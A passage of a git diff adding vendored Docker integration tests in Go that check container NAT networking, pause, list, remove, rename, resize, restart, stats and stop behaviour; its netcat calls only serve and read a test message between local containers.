+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/go-connections/nat"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestNetworkNat(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+
+	msg := "it works"
+	startServerContainer(t, msg, 8080)
+
+	endpoint := getExternalAddress(t)
+	conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080))
+	assert.NilError(t, err)
+	defer conn.Close()
+
+	data, err := ioutil.ReadAll(conn)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data))))
+}
+
+func TestNetworkLocalhostTCPNat(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+
+	msg := "hi yall"
+	startServerContainer(t, msg, 8081)
+
+	conn, err := net.Dial("tcp", "localhost:8081")
+	assert.NilError(t, err)
+	defer conn.Close()
+
+	data, err := ioutil.ReadAll(conn)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(msg, strings.TrimSpace(string(data))))
+}
+
+func TestNetworkLoopbackNat(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+
+	msg := "it works"
+	serverContainerID := startServerContainer(t, msg, 8080)
+
+	endpoint := getExternalAddress(t)
+
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String())), container.WithTty(true), container.WithNetworkMode("container:"+serverContainerID))
+
+	poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond))
+
+	body, err := client.ContainerLogs(ctx, cID, types.ContainerLogsOptions{
+		ShowStdout: true,
+	})
+	assert.NilError(t, err)
+	defer body.Close()
+
+	var b bytes.Buffer
+	_, err = io.Copy(&b, body)
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal(msg, strings.TrimSpace(b.String())))
+}
+
+func startServerContainer(t *testing.T, msg string, port int) string {
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithName("server-"+t.Name()), container.WithCmd("sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port)), container.WithExposedPorts(fmt.Sprintf("%d/tcp", port)), func(c *container.TestContainerConfig) {
+		c.HostConfig.PortBindings = nat.PortMap{
+			nat.Port(fmt.Sprintf("%d/tcp", port)): []nat.PortBinding{
+				{
+					HostPort: fmt.Sprintf("%d", port),
+				},
+			},
+		}
+	})
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	return cID
+}
+
+func getExternalAddress(t *testing.T) net.IP {
+	iface, err := net.InterfaceByName("eth0")
+	skip.If(t, err != nil, "Test not running with `make test-integration`. Interface eth0 not found: %s", err)
+
+	ifaceAddrs, err := iface.Addrs()
+	assert.NilError(t, err)
+	assert.Check(t, 0 != len(ifaceAddrs))
+
+	ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String())
+	assert.NilError(t, err)
+
+	return ifaceIP
+}
diff --git a/vendor/github.com/docker/docker/integration/container/pause_test.go b/vendor/github.com/docker/docker/integration/container/pause_test.go
new file mode 100644
index 0000000000..8dd2d784b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/pause_test.go
@@ -0,0 +1,98 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"io"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestPause(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType == "windows" && testEnv.DaemonInfo.Isolation == "process")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	since := request.DaemonUnixTime(ctx, t, client, testEnv)
+
+	err := client.ContainerPause(ctx, cID)
+	assert.NilError(t, err)
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(true, inspect.State.Paused))
+
+	err = client.ContainerUnpause(ctx, cID)
+	assert.NilError(t, err)
+
+	until := request.DaemonUnixTime(ctx, t, client, testEnv)
+
+	messages, errs := client.Events(ctx, types.EventsOptions{
+		Since:   since,
+		Until:   until,
+		Filters: filters.NewArgs(filters.Arg("container", cID)),
+	})
+	assert.Check(t, is.DeepEqual([]string{"pause", "unpause"}, getEventActions(t, messages, errs)))
+}
+
+func TestPauseFailsOnWindowsServerContainers(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "windows" || testEnv.DaemonInfo.Isolation != "process")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerPause(ctx, cID)
+	assert.Check(t, is.ErrorContains(err, "cannot pause Windows Server Containers"))
+}
+
+func TestPauseStopPausedContainer(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.31"), "broken in earlier versions")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerPause(ctx, cID)
+	assert.NilError(t, err)
+
+	err = client.ContainerStop(ctx, cID, nil)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond))
+}
+
+func getEventActions(t *testing.T, messages <-chan events.Message, errs <-chan error) []string {
+	var actions []string
+	for {
+		select {
+		case err := <-errs:
+			assert.Check(t, err == nil || err == io.EOF)
+			return actions
+		case e := <-messages:
+			actions = append(actions, e.Status)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/ps_test.go b/vendor/github.com/docker/docker/integration/container/ps_test.go
new file mode 100644
index 0000000000..4ae07043ab
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/ps_test.go
@@ -0,0 +1,49 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestPsFilter(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	prev := container.Create(t, ctx, client)
+	top := container.Create(t, ctx, client)
+	next := container.Create(t, ctx, client)
+
+	containerIDs := func(containers []types.Container) []string {
+		var entries []string
+		for _, container := range containers {
+			entries = append(entries, container.ID)
+		}
+		return entries
+	}
+
+	f1 := filters.NewArgs()
+	f1.Add("since", top)
+	q1, err := client.ContainerList(ctx, types.ContainerListOptions{
+		All:     true,
+		Filters: f1,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(containerIDs(q1), next))
+
+	f2 := filters.NewArgs()
+	f2.Add("before", top)
+	q2, err := client.ContainerList(ctx, types.ContainerListOptions{
+		All:     true,
+		Filters: f2,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(containerIDs(q2), prev))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/remove_test.go b/vendor/github.com/docker/docker/integration/container/remove_test.go
new file mode 100644
index 0000000000..5de13f22ad
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/remove_test.go
@@ -0,0 +1,112 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"os"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) {
+	if testEnv.OSType == "windows" {
+		return "c:", `\`
+	}
+	return "", "/"
+}
+
+// Test case for #5244: `docker rm` fails if bind dir doesn't exist anymore
+func TestRemoveContainerWithRemovedVolume(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	tempDir := fs.NewDir(t, "test-rm-container-with-removed-volume", fs.WithMode(0755))
+	defer tempDir.Remove()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithBind(tempDir.Path(), prefix+slash+"test"))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	err := os.RemoveAll(tempDir.Path())
+	assert.NilError(t, err)
+
+	err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{
+		RemoveVolumes: true,
+	})
+	assert.NilError(t, err)
+
+	_, _, err = client.ContainerInspectWithRaw(ctx, cID, true)
+	assert.Check(t, is.ErrorContains(err, "No such container"))
+}
+
+// Test case for #2099/#2125
+func TestRemoveContainerWithVolume(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("true"), container.WithVolume(prefix+slash+"srv"))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	insp, _, err := client.ContainerInspectWithRaw(ctx, cID, true)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(1, len(insp.Mounts)))
+	volName := insp.Mounts[0].Name
+
+	err = client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{
+		RemoveVolumes: true,
+	})
+	assert.NilError(t, err)
+
+	volumes, err := client.VolumeList(ctx, filters.NewArgs(filters.Arg("name", volName)))
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(0, len(volumes.Volumes)))
+}
+
+func TestRemoveContainerRunning(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client)
+
+	err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{})
+	assert.Check(t, is.ErrorContains(err, "cannot remove a running container"))
+}
+
+func TestRemoveContainerForceRemoveRunning(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client)
+
+	err := client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{
+		Force: true,
+	})
+	assert.NilError(t, err)
+}
+
+func TestRemoveInvalidContainer(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	err := client.ContainerRemove(ctx, "unknown", types.ContainerRemoveOptions{})
+	assert.Check(t, is.ErrorContains(err, "No such container"))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/rename_test.go b/vendor/github.com/docker/docker/integration/container/rename_test.go
new file mode 100644
index 0000000000..c3f46e10c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/rename_test.go
@@ -0,0 +1,213 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/stringid"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+// This test simulates the scenario mentioned in #31392:
+// Having two linked container, renaming the target and bringing a replacement
+// and then deleting and recreating the source container linked to the new target.
+// This checks that "rename" updates source container correctly and doesn't set it to null.
+func TestRenameLinkedContainer(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions")
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	aName := "a0" + t.Name()
+	bName := "b0" + t.Name()
+	aID := container.Run(t, ctx, client, container.WithName(aName))
+	bID := container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName))
+
+	err := client.ContainerRename(ctx, aID, "a1"+t.Name())
+	assert.NilError(t, err)
+
+	container.Run(t, ctx, client, container.WithName(aName))
+
+	err = client.ContainerRemove(ctx, bID, types.ContainerRemoveOptions{Force: true})
+	assert.NilError(t, err)
+
+	bID = container.Run(t, ctx, client, container.WithName(bName), container.WithLinks(aName))
+
+	inspect, err := client.ContainerInspect(ctx, bID)
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual([]string{"/" + aName + ":/" + bName + "/" + aName}, inspect.HostConfig.Links))
+}
+
+func TestRenameStoppedContainer(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	oldName := "first_name" + t.Name()
+	cID := container.Run(t, ctx, client, container.WithName(oldName), container.WithCmd("sh"))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("/"+oldName, inspect.Name))
+
+	newName := "new_name" + stringid.GenerateNonCryptoID()
+	err = client.ContainerRename(ctx, oldName, newName)
+	assert.NilError(t, err)
+
+	inspect, err = client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("/"+newName, inspect.Name))
+}
+
+func TestRenameRunningContainerAndReuse(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	oldName := "first_name" + t.Name()
+	cID := container.Run(t, ctx, client, container.WithName(oldName))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	newName := "new_name" + stringid.GenerateNonCryptoID()
+	err := client.ContainerRename(ctx, oldName, newName)
+	assert.NilError(t, err)
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("/"+newName, inspect.Name))
+
+	_, err = client.ContainerInspect(ctx, oldName)
+	assert.Check(t, is.ErrorContains(err, "No such container: "+oldName))
+
+	cID = container.Run(t, ctx, client, container.WithName(oldName))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err = client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("/"+oldName, inspect.Name))
+}
+
+func TestRenameInvalidName(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	oldName := "first_name" + t.Name()
+	cID := container.Run(t, ctx, client, container.WithName(oldName))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerRename(ctx, oldName, "new:invalid")
+	assert.Check(t, is.ErrorContains(err, "Invalid container name"))
+
+	inspect, err := client.ContainerInspect(ctx, oldName)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(cID, inspect.ID))
+}
+
+// Test case for GitHub issue 22466
+// Docker's service discovery works for named containers so
+// ping to a named container should work, and an anonymous
+// container without a name does not work with service discovery.
+// However, an anonymous could be renamed to a named container.
+// This test is to make sure once the container has been renamed,
+// the service discovery for the (re)named container works.
+func TestRenameAnonymousContainer(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	networkName := "network1" + t.Name()
+	_, err := client.NetworkCreate(ctx, networkName, types.NetworkCreate{})
+
+	assert.NilError(t, err)
+	cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{
+			networkName: {},
+		}
+		c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName)
+	})
+
+	container1Name := "container1" + t.Name()
+	err = client.ContainerRename(ctx, cID, container1Name)
+	assert.NilError(t, err)
+	// Stop/Start the container to get registered
+	// FIXME(vdemeester) this is a really weird behavior as it fails otherwise
+	err = client.ContainerStop(ctx, container1Name, nil)
+	assert.NilError(t, err)
+	err = client.ContainerStart(ctx, container1Name, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	count := "-c"
+	if testEnv.OSType == "windows" {
+		count = "-n"
+	}
+	cID = container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.NetworkingConfig.EndpointsConfig = map[string]*network.EndpointSettings{
+			networkName: {},
+		}
+		c.HostConfig.NetworkMode = containertypes.NetworkMode(networkName)
+	}, container.WithCmd("ping", count, "1", container1Name))
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(0, inspect.State.ExitCode), "container %s exited with the wrong exitcode: %+v", cID, inspect)
+}
+
+// TODO: should be a unit test
+func TestRenameContainerWithSameName(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	oldName := "old" + t.Name()
+	cID := container.Run(t, ctx, client, container.WithName(oldName))
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+	err := client.ContainerRename(ctx, oldName, oldName)
+	assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name"))
+	err = client.ContainerRename(ctx, cID, oldName)
+	assert.Check(t, is.ErrorContains(err, "Renaming a container with the same name"))
+}
+
+// Test case for GitHub issue 23973
+// When a container is being renamed, the container might
+// be linked to another container. In that case, the meta data
+// of the linked container should be updated so that the other
+// container could still reference to the container that is renamed.
+func TestRenameContainerWithLinkedContainer(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	db1Name := "db1" + t.Name()
+	db1ID := container.Run(t, ctx, client, container.WithName(db1Name))
+	poll.WaitOn(t, container.IsInState(ctx, client, db1ID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	app1Name := "app1" + t.Name()
+	app2Name := "app2" + t.Name()
+	app1ID := container.Run(t, ctx, client, container.WithName(app1Name), container.WithLinks(db1Name+":/mysql"))
+	poll.WaitOn(t, container.IsInState(ctx, client, app1ID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerRename(ctx, app1Name, app2Name)
+	assert.NilError(t, err)
+
+	inspect, err := client.ContainerInspect(ctx, app2Name+"/mysql")
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(db1ID, inspect.ID))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/resize_test.go b/vendor/github.com/docker/docker/integration/container/resize_test.go
new file mode 100644
index 0000000000..5961af0a47
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/resize_test.go
@@ -0,0 +1,66 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"net/http"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	req "github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestResize(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerResize(ctx, cID, types.ResizeOptions{
+		Height: 40,
+		Width:  40,
+	})
+	assert.NilError(t, err)
+}
+
+func TestResizeWithInvalidSize(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.32"), "broken in earlier versions")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client)
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	endpoint := "/containers/" + cID + "/resize?h=foo&w=bar"
+	res, _, err := req.Post(endpoint)
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(http.StatusBadRequest, res.StatusCode))
+}
+
+func TestResizeWhenContainerNotStarted(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("echo"))
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerResize(ctx, cID, types.ResizeOptions{
+		Height: 40,
+		Width:  40,
+	})
+	assert.Check(t, is.ErrorContains(err, "is not running"))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/restart_test.go b/vendor/github.com/docker/docker/integration/container/restart_test.go
new file mode 100644
index 0000000000..69007218f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/restart_test.go
@@ -0,0 +1,114 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"fmt"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/internal/test/daemon"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+func TestDaemonRestartKillContainers(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run")
+	type testCase struct {
+		desc       string
+		config     *container.Config
+		hostConfig *container.HostConfig
+
+		xRunning            bool
+		xRunningLiveRestore bool
+		xStart              bool
+	}
+
+	for _, c := range []testCase{
+		{
+			desc:                "container without restart policy",
+			config:              &container.Config{Image: "busybox", Cmd: []string{"top"}},
+			xRunningLiveRestore: true,
+			xStart:              true,
+		},
+		{
+			desc:                "container with restart=always",
+			config:              &container.Config{Image: "busybox", Cmd: []string{"top"}},
+			hostConfig:          &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}},
+			xRunning:            true,
+			xRunningLiveRestore: true,
+			xStart:              true,
+		},
+		{
+			desc:       "container created should not be restarted",
+			config:     &container.Config{Image: "busybox", Cmd: []string{"top"}},
+			hostConfig: &container.HostConfig{RestartPolicy: container.RestartPolicy{Name: "always"}},
+		},
+	} {
+		for _, liveRestoreEnabled := range []bool{false, true} {
+			for fnName, stopDaemon := range map[string]func(*testing.T, *daemon.Daemon){
+				"kill-daemon": func(t *testing.T, d *daemon.Daemon) {
+					err := d.Kill()
+					assert.NilError(t, err)
+				},
+				"stop-daemon": func(t *testing.T, d *daemon.Daemon) {
+					d.Stop(t)
+				},
+			} {
+				t.Run(fmt.Sprintf("live-restore=%v/%s/%s", liveRestoreEnabled, c.desc, fnName), func(t *testing.T) {
+					c := c
+					liveRestoreEnabled := liveRestoreEnabled
+					stopDaemon := stopDaemon
+
+					t.Parallel()
+
+					d := daemon.New(t)
+					client, err := d.NewClient()
+					assert.NilError(t, err)
+
+					args := []string{"--iptables=false"}
+					if liveRestoreEnabled {
+						args = append(args, "--live-restore")
+					}
+
+					d.StartWithBusybox(t, args...)
+					defer d.Stop(t)
+					ctx := context.Background()
+
+					resp, err := client.ContainerCreate(ctx, c.config, c.hostConfig, nil, "")
+					assert.NilError(t, err)
+					defer client.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{Force: true})
+
+					if c.xStart {
+						err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{})
+						assert.NilError(t, err)
+					}
+
+					stopDaemon(t, d)
+					d.Start(t, args...)
+
+					expected := c.xRunning
+					if liveRestoreEnabled {
+						expected = c.xRunningLiveRestore
+					}
+
+					var running bool
+					for i := 0; i < 30; i++ {
+						inspect, err := client.ContainerInspect(ctx, resp.ID)
+						assert.NilError(t, err)
+
+						running = inspect.State.Running
+						if running == expected {
+							break
+						}
+						time.Sleep(2 * time.Second)
+
+					}
+					assert.Equal(t, expected, running, "got unexpected running state, expected %v, got: %v", expected, running)
+					// TODO(cpuguy83): test pause states... this seems to be rather undefined currently
+				})
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/stats_test.go b/vendor/github.com/docker/docker/integration/container/stats_test.go
new file mode 100644
index 0000000000..6493a30573
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/stats_test.go
@@ -0,0 +1,43 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestStats(t *testing.T) {
+	skip.If(t, !testEnv.DaemonInfo.MemoryLimit)
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	info, err := client.Info(ctx)
+	assert.NilError(t, err)
+
+	cID := container.Run(t, ctx, client)
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond))
+
+	resp, err := client.ContainerStats(ctx, cID, false)
+	assert.NilError(t, err)
+	defer resp.Body.Close()
+
+	var v *types.Stats
+	err = json.NewDecoder(resp.Body).Decode(&v)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(int64(v.MemoryStats.Limit), info.MemTotal))
+	err = json.NewDecoder(resp.Body).Decode(&v)
+	assert.Assert(t, is.ErrorContains(err, ""), io.EOF)
+}
diff --git a/vendor/github.com/docker/docker/integration/container/stop_test.go b/vendor/github.com/docker/docker/integration/container/stop_test.go
new file mode 100644
index 0000000000..7a2fa20188
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/stop_test.go
@@ -0,0 +1,127 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"fmt"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	"gotest.tools/icmd"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestStopContainerWithRestartPolicyAlways(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	names := []string{"verifyRestart1-" + t.Name(), "verifyRestart2-" + t.Name()}
+	for _, name := range names {
+		container.Run(t, ctx, client, container.WithName(name), container.WithCmd("false"), func(c *container.TestContainerConfig) {
+			c.HostConfig.RestartPolicy.Name = "always"
+		})
+	}
+
+	for _, name := range names {
+		poll.WaitOn(t, container.IsInState(ctx, client, name, "running", "restarting"), poll.WithDelay(100*time.Millisecond))
+	}
+
+	for _, name := range names {
+		err := client.ContainerStop(ctx, name, nil)
+		assert.NilError(t, err)
+	}
+
+	for _, name := range names {
+		poll.WaitOn(t, container.IsStopped(ctx, client, name), poll.WithDelay(100*time.Millisecond))
+	}
+}
+
+// TestStopContainerWithTimeout checks that ContainerStop with
+// a timeout works as documented, i.e. in case of negative timeout
+// waiting is not limited (issue #35311).
+func TestStopContainerWithTimeout(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	testCmd := container.WithCmd("sh", "-c", "sleep 2 && exit 42")
+	testData := []struct {
+		doc              string
+		timeout          int
+		expectedExitCode int
+	}{
+		// In case container is forcefully killed, 137 is returned,
+		// otherwise the exit code from the above script
+		{
+			"zero timeout: expect forceful container kill",
+			0, 137,
+		},
+		{
+			"too small timeout: expect forceful container kill",
+			1, 137,
+		},
+		{
+			"big enough timeout: expect graceful container stop",
+			3, 42,
+		},
+		{
+			"unlimited timeout: expect graceful container stop",
+			-1, 42,
+		},
+	}
+
+	for _, d := range testData {
+		d := d
+		t.Run(strconv.Itoa(d.timeout), func(t *testing.T) {
+			t.Parallel()
+			id := container.Run(t, ctx, client, testCmd)
+
+			timeout := time.Duration(d.timeout) * time.Second
+			err := client.ContainerStop(ctx, id, &timeout)
+			assert.NilError(t, err)
+
+			poll.WaitOn(t, container.IsStopped(ctx, client, id),
+				poll.WithDelay(100*time.Millisecond))
